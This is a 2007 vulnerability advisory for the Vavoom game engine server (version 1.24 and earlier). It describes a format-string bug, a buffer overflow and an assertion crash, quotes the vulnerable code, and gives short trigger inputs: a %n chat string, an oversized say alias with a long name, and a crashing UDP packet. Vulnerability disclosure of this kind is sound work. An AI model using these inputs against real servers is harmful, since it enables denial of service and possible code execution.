####################################################################### Luigi Auriemma Application: Vavoom http://www.vavoom-engine.com Versions: Windows, DOS, *nix, *BSD and more Platforms: <= 1.24 Bugs: A] Say format string B] BroadcastPrintf buffer-overflow C] "NewLen >= 0" assertion failed Exploitation: remote, versus server Date: 23 Aug 2007 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Vavoom is an open source engine based on the GPLed Doom engine with many interesting features. ####################################################################### ======= 2) Bugs ======= -------------------- A] Say format string -------------------- format string vulnerability exploitable through the sending of a chat message, the BroadcastPrintf function is called passing a string containing the name of the user plus his message without the proper format argument. from sv_main.cpp: COMMAND(Say) { guard(COMMAND Say); if (Source == SRC_Command) { #ifdef CLIENT ForwardToServer(); #endif return; } if (Args.Num() < 2) return; VStr Text = Player->PlayerName; Text += ":"; for (int i = 1; i < Args.Num(); i++) { Text += " "; Text += Args[i]; } GLevelInfo->BroadcastPrintf(*Text); GLevelInfo->StartSound(TVec(0, 0, 0), 0, GSoundManager->GetSoundID("misc/chat"), 0, 1.0, 0); unguard; } ---------------------------------- B] BroadcastPrintf buffer-overflow ---------------------------------- buffer-overflow vulnerability located in the BroadcastPrintf function, the steps for exploiting it are the same of the previous bug. from p_thinker.cpp: void VThinker::BroadcastPrintf(const char *s, ...) { guard(VThinker::BroadcastPrintf); va_list v; char buf[1024]; va_start(v, s); vsprintf(buf, s, v); va_end(v); for (int i = 0; i < svs.max_clients; i++) if (Level->Game->Players[i]) Level->Game->Players[i]->eventClientPrint(buf); unguard; } --------------------------------- C] "NewLen >= 0" assertion failed --------------------------------- a failed assert in the following function called, for example, when a string is passed with an invalid size allows an attacker to terminate the server. from str.cpp: void VStr::Resize(int NewLen) { guard(VStr::Resize); check(NewLen >= 0); ... ####################################################################### =========== 3) The Code =========== A] send a chat message containing %n%n%n%n%s B] open the cfg file, for example vavoom\basev\doom2\config.cfg, and add the following lines alias bof "say aaa...(992_'a's)...aaa" name "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" C] send an UDP packet (port 26000) containing the following hex bytes: 80 02 ff 00 ####################################################################### ====== 4) Fix ====== I have sent a mail to the developer #######################################################################